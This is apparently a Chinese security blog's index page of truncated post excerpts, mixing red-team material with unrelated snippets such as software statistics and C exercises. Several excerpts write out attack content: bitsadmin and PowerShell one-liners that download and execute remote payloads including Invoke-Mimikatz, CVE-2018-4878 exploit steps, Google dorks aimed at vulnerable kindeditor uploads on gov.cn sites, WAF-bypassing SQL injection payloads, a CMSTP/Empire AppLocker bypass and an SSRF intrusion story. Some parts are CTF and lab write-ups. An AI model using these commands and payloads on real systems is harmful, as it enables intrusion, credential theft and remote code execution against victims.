红队攻击面相关讨论

1.bitsadmin命令（只能命令下载到指定路径上，win7以上）： bitsadmin /transfer myDownLoadJob /download /priority normal "https://www.ishack.org/tu/rtjxy4ppzcc18198.jpg" "d:\abc.jpg" bitsadmin /transfer d90f http://site.com/a %APPDATA%\d90f.exe&%APPDATA%\d90f.exe&del %APPDATA%\d90f.exe 2.powershell命名下载执行：（win7以上） powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz powershell -exec bypass -f \\webdavserver\folder\payload.ps1 powershell (new-object System.Net.WebClient).DownloadFile( ‘http://192.168.168.183/1.exe’,’C:\111111111111111.exe’) powershell -w h…

文章数据及部分内容参考来源 参考文章链接：https://radixweb.com/blog/software-development-statistics 参考文章作者：Ravikumar Patel 文章内容总结：Frex 文章内容翻译：Frex 》01 情况综述 很少有其他行业能像软件开发一样快速发展。人工智能、机器学习、物联网等技术的快速发展对许多行业产生了重大影响，包括软件开发。这是软件开发近期增长发展的主要原因。 观察当今的数字时代，软件在帮助各家公司创建自动化工具、降低成本和提升客户体验方面发挥着关键性的作用，是帮助各家公司将这些能力聚集起来的主要动力。无论其公司所在的行业领域情况如何，软件为从智能手机到复杂的企业系统的一切行动提供可靠安全的动力。对于生活在数字时代的Programers，了解软件开发的格局至关重要。为了展示其巨大影响，我整理了一些重要的关于软件开发的统计数据。 》02 软件开发相关数据汇总 预计到2024年底，全球软件开发人员总数将达2870万。其数量在最近4年内增长了320万。美国有将近430万名软件开发人员。 84.7%的软件开发项目基于企业应用。53.6%的软件开发项目基于业务自动化，38.50%属于电子商务项目。 2024年，IT行业的发展情况预计将超过疫情前的状态，预计年复合增长率（CAGR）会达到5%。 预计到2027年，软件开发市场份额将达到10.39亿美元，2020年~2027年的年复合增长率将到达22.54%。 大约54%的软…

前言 29号开始的 31号域开始打,打了一天到2月1 WEEK1就卡瓶颈了 整个参赛人数接近2千,写笔记记录一下一些脚本和解题思路 注:本文章在比赛结束前已开启文章密码保护,未泄露解题思路,比赛结束后正式开放文章 ->Web方向 冲 Bypass it 点击注册 尝试burpsuite爆破无果,题目说不让禁用js 但那是迷惑人的,最后禁用js就可以注册成功 禁用后注册即可 注册成功直接登录就能拿到flag ez http 打开后发现需要添加refrer头跟进访问此网站 Burpsuite开盒即用中文版： 最新BurpSuite2023专业汉化版下载（无需任何配置） 2年前29106110 抓包发送到重放器里面,且添加头部文件 让后这里说需要添加ua标识 直接复制在改上去 有实战渗透的的操作了(出的题就是好!,因为一些学校的edu还有公司网站的后…

0×01 静态检测与对抗 1.静态分析原理 简单的来说，就是通过特征码识别静态文件，杀软会扫描存在磁盘上的镜像文件，如果满足特征码，就识别为恶意软件。 恶意软件匹配规则yara匹配恶意软件的时候就是用的这样的方式。 通过特征来识别抓HASH工具QuarksPwDump，yara规则如下（查看源码) /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule QuarksPwDump_Gen : Toolkit { meta: description = "Detects all QuarksPWDump versions" author = "Florian Roth" date = "2015-09-29" score = 80 hash1 = "2b86e6aea37c324ce686bd2b49cf5b871d90f51cec24476daa01dd69543b54fa" hash2 = "87e4c76cd194568e65287f894b4afcef26d498386de181f568879dde124ff48f" hash3 = "a59be92bf4cce04335bd1a1fcf0…

0x01 前言 Adobe公司在当地时间2018年2月1日发布了一条安全公告： https://helpx.adobe.com/security/products/flash-player/apsa18-01.html 公告称一个新的Flash 0Day漏洞（CVE-2018-4878）已经存在野外利用，可针对Windows用户发起定向攻击。攻击者可以诱导用户打开包含恶意 Flash 代码文件的 Microsoft Office 文档、网页、垃圾电子邮件等。 0x02 漏洞影响 Flash Player当前最新版本28.0.0.137以及之前的所有版本 0x03 漏洞复现 环境测试： 攻击机：kali 目标靶机：win7x64 +IE8.0+FLASH player28.0.0.137 1.下载cve-2018-4878的脚步利用 wget https://raw.githubusercontent.com/backlion/demo/master/CVE-2018-4878.rar 2.解压压缩文件后，可看到cve-2018-4878.py和exploit.swf 3.我们需要对cve-2018-4878.py进行修改，原作者将代码中的stageless变量改成了true，正确的应该改成：stageless = False。附上原作者的exp地址：https://github.com/anbai-inc/CVE-2018-4878.git 4.其次需要修改替换原来弹计算器的shellcode …

前言 直接放视频地址建议b站观看 https://tryhackme.com/r/room/expose sql注入+文件包含+文件上传+提权

重在参与,主打一个陪伴 谁偷吃了我的外卖 下载地址https://pan.baidu.com/share/init?surl=kD5ISEjctcMVSua8PKQsgg 打开之后是一张图片 分离后是个zip 打开后有加密并且给了提示 第一个是空的 最后一个是 base64 被偷的是第一个 – = / 的意思是把-替换成/ 使用脚本去掉第一个提取中间的的四个字符 import zipfile import re import base64 with zipfile.ZipFile("/外卖箱.zip", 'r') as zf: fileNameList = zf.namelist() infoDict = {} for fileName in fileNameList: matchedData = re.findall(r'\d{1,}_[a-zA-Z0-9-+=\/]{4}', fileName) if matchedData != []: infoDict[matchedData[0][0:matchedData[0].find('_')]] = matchedData[0][matchedData[0].find('_')+1:] content = '' for idx in range(2,…

###命令执行定义 直接调用操作系统命令： 当应用需要调用一些外部程序去处理内容的情况下，就会用到一些执行系统命令的函数。如PHP中的system，exec，shell_exec等，当用户可以控制命令执行函数中的参数时，将可注入恶意系统命令到正常命令中，造成命令执行攻击。 命令执行是指攻击者通过浏览器或者其他客户端软件提交一些cmd命令（或者bash命令）至服务器程序，服务器程序通过system、eval、exec等函数直接或者间接地调用cmd.exe执行攻击者提交的命令。 系统命令执行是指应用程序对传入命令行的参数过滤不严格导致恶意用户能控制最终执行的命令。应用有时需要调用一些执行系统命令的函数，如PHP中的system、exec、shell_exec、passthru、popen、proc_popen等，当用户能控制这些函数中的参数时，就可以将恶意系统命令拼接到正常命令中，从而造成命令执行攻击，这就是命令执行漏洞。 ###命令执行与代码执行的判断与区别 参考OWASP的 代码注入和命令注入，其中的相关解释:可以用下面一句话判断是代码执行还是命令执行：执行效果是否受制于语言本身与其安全机制。 代码执行漏洞指的是可以执行PHP脚本代码，而命令执行漏洞指的是可以执行系统命令或应用指令（如cmd命令或bash命令）的漏洞。代码执行漏洞是调用系统命令的漏洞，命令执行漏洞是直接调用系统命令，又称为os命令执行漏洞。 这里先给大家看一下两种漏洞的区别，命令执行长这样： 代码执行长这样： 1.代码执行 1. 执行的…

0x00 漏洞描述 漏洞存在于kindeditor编辑器里，你能上传.txt和.html文件，支持php/asp/jsp/asp.net,漏洞存在于小于等于kindeditor4.1.5编辑器中 这里html里面可以嵌套暗链接地址以及嵌套xss。Kindeditor上的uploadbutton.html用于文件上传功能页面，直接POST到/upload_json.*?dir=file，在允许上传的文件扩展名中包含htm,txt：extTable.Add("file","doc,docx,xls,xlsx,ppt,htm,html,txt,zip,rar,gz,bz2") 0x01 批量搜索 在google中批量搜索： inurl:/examples/uploadbutton.html inurl:/php/upload_json.php inurl:/asp.net/upload_json.ashx inurl://jsp/upload_json.jsp inurl://asp/upload_json.asp inurl:gov.cn/kindeditor/ 0x02 漏洞问题 根本脚本语言自定义不同的上传地址，上传之前有必要验证文件 upload_json.* 的存在 /asp/upload_json.asp /asp.net/upload_json.ashx /jsp/upload_json.jsp /php/upload_json.php 可目录变量查看是否存在那种脚本上传漏洞: …

前言 2017年6月13日，微软官方发布编号为CVE-2017-8464的漏洞公告，官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞，黑客可以通过U盘、网络共享等途径触发漏洞，完全控制用户系统，安全风险高危 漏洞描述 攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。 当用户在Windows资源管理器或解析.LNK文件的任何其他应用程序中打开此驱动器（或远程共享）时，恶意二进制程序将在目标系统上执行攻击者选择的代码，成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。 注释:.LNK是windows系统内应用程序快捷方式文件的文件类型后缀名。 漏洞利用条件和方式: 远程利用 漏洞影响范围: Microsoft Windows 10 Version 1607 for 32-bit Systems Microsoft Windows 10 Version 1607 for x64-based Systems Microsoft Windows 10 for 32-bit Systems Microsoft Windows 10 for x64-based Systems Microsoft Windows 10 version 1511 for 32-bit Systems Microsoft Windows 10 version 1511 for x64-based Systems Microsoft Windows 10 version 1703 …

前言 Web89 intval取整数 就跟python中的int一样 这里是只要有0-9就输出nonono 但是还需要是传出去是整数 所以我们用数组绕过 Web90 intval($var,$base)，其中var必填，base可选，这里base=0,则表示根据var开始的数字决定使用的进制： 0x或0X开头使用十六进制，0开头使用八进制，否则使用十进制。 这里是0开头 说明是根据开始的数字决定使用的进制 这里用的是八进制十六进制绕过 加0是告诉服务器这是八进制 如果转换成十六进制需要加0x Web91 不想打字了,感觉WP里给的说的好全面 i忽略大小写 m多行模式 我们只要让我们的参数里含有php即可 payload:cmd?=111%0aphp 或者cmd?=php%0aggg Web92 这里与web90的不同之处就在于等号了 ===表示类型和数值必须相等 ==是值相等就可以类型不一定相等 我们知道强制转换如果是小数部分的话会舍弃小数部分直接构造小数 Web93 不解释直接秒 Web94 查一下strpos用法 这里说明我们得含有0 但不能在开头,因为开头告诉服务器使用几进制 Web95 过滤了.八进制起手 +或者空格绕过最后一个限制 W…

Windows environments provide a group policy setting which allows a regular user to install a Microsoft Windows Installer Package (MSI) with system privileges. This can be discovered in environments where a standard user wants to install an application which requires system privileges and the administrator would like to avoid to give temporary local administrator access to a user. From the security point of view this can be abused by an attacker in order to escalate his privileges to the box to SYSTEM. Identification Lets assume that we have already compromised a host inside the network and we have a Meterpreter session. Meterpreter Session – Normal user The easiest…

对于代码的疑问和改进欢迎交流和讨论，QQ：3153233088 后续注释会有的 1051: 平方根的和 这里介绍两种开平方根的方法，都需要用到头文件<math.h> 1.sqrt函数，专门开平方根的函数 2.pow函数，这是一个求任意次方的函数，可以用pow(n,0.5)来求n的平方根。 #include <stdio.h> #include <math.h> int main() { int i,n; double sum=0,item; scanf("%lf %d",&item,&n); //下循环在求item的同时进行累加 for(i=1;i<=n;i++) { sum=item+sum; item=sqrt(item);//把item定义为double就是防止开根后小数的损失 } printf("%.2lf",sum); return 0; } 1052: 数列求和4 两种方法在于对各项的理解和求法 #include<stdio.h> int main() { int n,a,sum=0,x=0;//sum代表和，x为项的值 scanf("%d%d",&n,&a); for(int i=1;i<=n;i++) { x=x*10+a;//从第二项开始，每一项就等于前…

前言 因最近工作需求，需要对一些备案网站进行监测，寻找其存在的漏洞，例如主页篡改，挂暗链，弱口令等。在此期间发现一个有趣的案例，前来分享。 发现 这个发现其实也是蛮巧合的，大家先看一下这个首页 很神奇，一打开就提示404 not found，但是标题又提示官网-官方网，明显这个有猫腻 正常来说，404的话标题多数也会是404，查看源代码发现恶意js 进一步分析 var EhaqDJ1 = /(Baiduspider|360Spider|YisouSpider|YandexBot|Sogou inst spider|Sogou web spider|spider)/i; if (!EhaqDJ1[\"\\x74\\x65\\x73\\x74\"](navigator[ //test \"\\x75\\x73\\x65\\x72\\x41\\x67\\x65\\x6e\\x74\"])) { //userAgent let flag = navigator[\"\\x75\\x73\\x65\\x72\\x41\\x67\\x65\\x6e\\x74\"][ //userAgent \"\\x6d\\x61\\x74\\x63\\x68\" //match ]( /(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symb…

SQL注入9种绕过WAF方法 0x01前言 WAF区别于常规 防火墙 是因为WAF能够过滤特定Web应用程序的内容，而常规防火墙则充当服务器之间的防御门。通过检查HTTP的流量，它可以防御Web应用安全漏洞，如阻止来自 SQL注入、 跨站点脚本 （XSS）、 文件包含和安全配置错误。 0x02 WAF工作原理 § 检测异常协议：拒绝不符合HTTP标准的请求 § 增强型的输入验证：代理和服务器端验证，而不仅仅是客户端验证 § 白名单和黑名单 § 基于规则和异常的保护：基于规则的更多是基于黑色的机制和更灵活的异常 § 状态管理：防御会话保护(Cookie保护，反入侵规避技术，响应监控和信息披露保护)。 0x03 绕过WAF 1.混合的CaseChange恶意输入会触发WAF保护，如果WAF使用区分大小写的黑名单，则更改大小写可能会绕过该过滤器。 http://target.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4 2.替换关键字（插入将被WAF删除的特殊字符）---SELECT可能变为SEL <ECT，一旦删除特殊字符，它将用SELECT执行 http://target.com/index.php?page_id=-15&nbsp;UNIunionON SELselectECT 1,2,3,4 3.编码 page.php?id=1%252f%252a*/UNION%252f%252a /SELECT 十六进制编码： target.com/i…

前言 RCE命令执行(可看前面发布的ctfshow的靶场)已打,ctfshow给的命令执行比较直接一点,相对于Thm打一遍再次巩固基础 自己现在的实力还是很菜 Foreign friends please use Google Translate plugin to translate this article for better viewing room:https://tryhackme.com/room/oscommandinjection 笔记 了解RCE漏洞 任务三命令注入 任务四修复命令注入 下一关 Windows 拿flag Ok 开下一章节 SQL注入 room：https://tryhackme.com/room/sqlinjectionlm SQL（结构化查询语言）注入，通常称为 SQLi，是对 Web 应用程序数据库服务器的攻击，导致执行恶意查询。当 Web 应用程序使用未经正确验证的用户输入与数据库进行通信时，攻击者有可能窃取、删除或更改私人数据和客户数据，并攻击 Web 应用程序身份验证方法以获取私有数据。或客户区。这就是为什么 SQLi 不仅是最古老的 Web 应用程序漏洞之一，而且也可能是最具破坏性的。 在这个房间中，您将了解什么是数据库、什么是SQL以及一些基本的 SQL 命令、如何检测 SQL 漏洞、如…

默认情况下，AppLocker允许在文件夹中执行二进制文件，这是可以绕过它的主要原因。已经发现，这样的二进制文件可以很容易地用于绕过AppLocker和UAC。与Microsoft相关的二进制文件之一是CMSTP。CMSTP welcomes INF文件，因此通过INF进行开发是可能的。因此，我们将学习如何进行此类开发。 众所周知，CMSTP接受SCT文件，然后无提示地运行，因此我们将创建一个恶意的SCT文件以实现我们的目标。为此，我们将使用Empire PowerShell。有关Empire PowerShell的详细指南，请单击此处。 从Kali终端启动Empire框架，然后输入以下命令以创建恶意软件： listeners uselistener http set Host 192.168.1.109 execute 上面的命令将为您创建一个侦听器，然后键入back以从侦听器接口返回，并且创建SCT文件类型： usestager windows/launcher_sct set Listener HTTP execute 运行上述漏洞将创建SCT文件。我们将使用以下脚本在PowerShell中执行文件。在此脚本中，给出SCT文件的路径，并添加以下代码，如图所示： 从这里下载此脚本： ;cmstp.exe /s cmstp.inf [version] Signature=$chicago$ AdvancedINF=2.5 [DefaultInstall_SingleUser] UnRegister…

1.搭建环境： 操作系统为：ubuntu16.04 x64位系统，内核版本3.0.10以上 2.安装docker镜像 root@backlion-virtual-machine:/# apt-get install docker.io 3.启动dokcer服务 root@backlion-virtual-machine:/# service docker start 4.拉取pocscan的镜像，并安装 root@backlion-virtual-machine:/# docker pull daocloud.io/aber/pocscan:latest 5.切换到根目录 root@backlion-virtual-machine:/# cd / 6.通过git clone下载源码到本地根目录 root@backlion-virtual-machine:/# git clone https://github.com/erevus-cn/pocscan.git 7.更改pocscan目录为可读可写权限 root@backlion-virtual-machine:/# chmod -R 0777 pocscan 8.将dokcer的8000端口映射到物理机的8090端口上 root@backlion-virtual-machine:/# docker run -d -v /pocscan:/www -p 8090:8000 -p 8088:8088 daocloud.io/aber/pocscan…

0x00 前言 ThinkPHP官方2018年12月9日发布重要的安全更新，修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新，由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞，受影响的版本包括5.0和5.1版本，推荐尽快更新到最新版本。 0x01 影响范围 5.x < 5.1.31, <= 5.0.23 0x02 漏洞分析 Thinkphp v5.0.x补丁地址: https://github.com/top-think/framework/commit/b797d72352e6b4eb0e11b6bc2a2ef25907b7756f Thinkphp v5.1.x补丁地址: https://github.com/top-think/framework/commit/802f284bec821a608e7543d91126abc5901b2815 路由信息中controller的部分进行了过滤，可知问题出现在路由调度时 关键代码： 在修复之前程序未对控制器进行过滤，导致攻击者可以通过引入\符号来调用任意类方法。 其中使用了$this->app->controller方法来实例化控制器，然后调用实例中的方法。跟进controller方法： 其中通过parseModuleAndClass方法解析出$module和$class，然后实例化$class。 而parseModuleAndClass方法中，当$…

0x00 前言 Raven 2是一个中等难度的boot2root 虚拟靶机。有四个flag需要找出。在多次被攻破后，Raven Security采取了额外措施来增强他们的网络服务器安全以防止黑客入侵。 靶机下载地址：https://download.vulnhub.com/raven/Raven2.ova 0x01 存活主机 1.在windows上的scan ports工具对目标整个网段(192.168.1.0/24)进行扫描发现192.168.1.12就是目标靶机，并开放了80，22，111端口。 2.在linux下可通过arp-scan和netdiscover命令进行主机存活探测,发现192.168.1.101是目标靶机. root@backlion#arp-scan -l or root@backlion#netdiscover -r192.168.1.0/24 0x02 端口探测 1.通过namp对目标主机进行端口扫描 nmap -A192.168.1.12 2.发现22，80和111端口是开放的，其中80端口运行了一个web应用,可以通过入侵web进入系统，爆破22端口由于目标靶机设置的系统口令太强，这里不建议爆破。 0x02 目录猜解 1.在linux中可以使用dirb进行目录扫描 2.同时也可以在windows上通过dirbuster进行目录扫描，更直观地看出目录结构。 3.扫到几个一级目录，一个个查看下文件的内容，在/vendor/目录下发现了两个有趣…

通知 下面将会发布四篇文章以小白的视角(我压根不用装,因为我也是第一次学)来第一人称学习一下计算机网络一些原理 而且较为基础,请不要认为我在水文章,反而我坚定的认为这些基础的知识为以后的渗透思路能提供很大帮助！ 模块地址：https://tryhackme.com/paths 其中第一篇网络安全只是引入安全就不必为大家更新 更新一下后四章,一章一个文章 深深解析一下：

0x00 APT的历史起源背景 APT这个词汇最早起源于：2005年英国和美国的CERT组织发布了关于有针对性的社交工程电子邮件，放弃特洛伊木马以泄露敏感信息的第一个警告，尽管没有使用“APT”这个名字。但 “先进的持续威胁”一词被广泛引用，2006年的美国空军Greg Rattray上校经常被引用为创造该术语的个人。后来，在Stuxnet震网事件就是专门针对伊朗的核计划的黑客攻击就是一个APT攻击例子。在计算机安全领域以及越来越多的媒体中，APT这个术语几乎总是用来指向针对政府，公司和政治活动家的黑客攻击的高级持续模式，而且也延伸到涉及到群体这些攻击背后。作为一个术语，高级持续威胁（APT）可以被转移焦点到攻击出现次数。一个常见的误解是APT只针对西方国家。西方国家可能会更多地宣传针对西方国家的技术性APT，但许多国家的行为者都将网络空间安全作为收集有关个人和群体的情报的手段。在美国，网络司令部的任务是协调美国军方，应对高级持续网络威胁，也就是APT攻击。 同时，许多消息来源都觉得一些APT组织实际上隶属于或者代表着民族和国家。否则很难持有大量信息和资源，三类机构容易面临高级持续威胁的高风险，即：高等教育,金融机构,政府机构。 实际上，一个APT是有一套隐匿和持续攻击的框架的，往往针对特定的实体由一人或多人策划（一般是多人）。APT通常针对高价值目标出于商业或政治动机进行实施的。APT在长时间的攻击中依旧会尽可能的保证高度隐蔽性。而“高级”意味着使用恶意软件来攻击系统漏洞的复杂技术。“持续”过程表明，APT攻击…

前言 本篇是紧接着上一篇文章因为篇幅过长而剩余的未分享案例与分类,本篇通过案例与碰到的漏洞类型来对我这两个月其中碰到的弱口令与爆力破解漏洞做一个总结,帮助小白快速了解这两种漏洞会遇到的实战情景,当然总结仅是我个人目前碰到的,如果不全,也请给位佬给我留言,方便我进行完善. 本篇博文是从自己的CSDN博客搬运而来,并不存在抄袭,首发原文链接:http://t.csdnimg.cn/71EUU 免责声明 以下漏洞案例均已经上报漏洞平台并且进行修复。请勿利用文章内的相关技术从事非法测试,若因此产生一切后果与本博客及本人无关。 弱口令与暴力破解介绍 弱口令是指容易被猜测或破解的密码，而爆破破解是一种通过穷举法尝试所有可能的密码组合以破解密码的方法。 弱口令通常指的是那些强度不高、容易被人猜到或者被破解工具所破解的密码。这类口令往往包含简单的数字和字母，例如“123”或“abc”，包括常见的生日日期、重复的数字和字母等。由于这些密码结构简单，没有混合使用大小写字母、数字及特殊字符，使得它们对渗透人员来说非常容易被识别和破解。 爆破破解则是一种基于穷举法的破解手段，它通过系统地尝试各种可能的密码组合直到找到正确的密码。这种方法对于人为设置的非随机密码尤为有效，因为人为设置的密码往往有一定的规律性，可以通过预设的密码字典或彩虹表来缩短破解所需的时间。在Web应用中，暴力破解常用于对应用系统的认证信息进行获取，渗透测试人员会使用大量认证信息尝试登录，直到得到正确的…

前言 本次主要是刷题 Web 258 直接生成,会pass掉以0开头+数字的不分大小写 仔细发现一共有两处 绕过正则 $b=str_replace(':11',':+11',$a); $d=str_replace(':8',':+8',$c); exp <?php class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public $class = 'info'; public function __construct(){ $this->class=new backDoor(); } public function login($u,$p){ return $this->username===$u&&$this->password===$p; } public function __destruct(){ $this->class->getInfo(); } } class info{ public $user='xxxxxx'; public function getInfo(){ return $this…

这次的目标是个购物站点，希望发现更多的漏洞，最好是能拿到shell。 一些常见的漏洞都存在，比如任意修改他人密码、修改商品金额等逻辑漏洞都是存在的。但这里就不提这些逻辑漏洞了，这里说一说ssrf。 注册会员后，前台很多上传点，但是均无法上传shell。 通过nmap扫描端口发现对外开放了3306端口，也就是mysql数据库端口。 然后在一处下载文件的地方，看到了个可疑的url。 通过dnslog测试，发现是个ssrf漏洞。 尝试访问百度，得到出是完全回显的ssrf漏洞。 尝试这个ssrf是否支持其他协议，发现支持file协议，完全回显，又可以读文件，真舒服。 那么现在只需要让网站报错 爆出绝对路径，或者尝试去读取一些配置文件看看能否找到网站的绝对路径，最终读取到网站数据库的配置文件，那么就可以连接上数据库就可以拿到管理员账号密码了。 读取到 /etc/httpd/conf/httpd.conf 这个文件，发现网站路径为 /var/www/html 。 于是准备尝试去读取index.php发现居然没有内容，最后各种测试，各种组合，都没任何关于网站的回显，自闭了。 没办法，那就只有想办法让网站报错，看看路径对不对。 终于找到了个点让网站报错，发现之前的路径不对。 最终经过翻代码，找到了数据库配置文件，成功的找到了数据库账号密码。 成功连上了数据库。 最终成功进了后台。 后台还有个这个功能…… 嗯…… 非常好 over…… Uploading Attachment...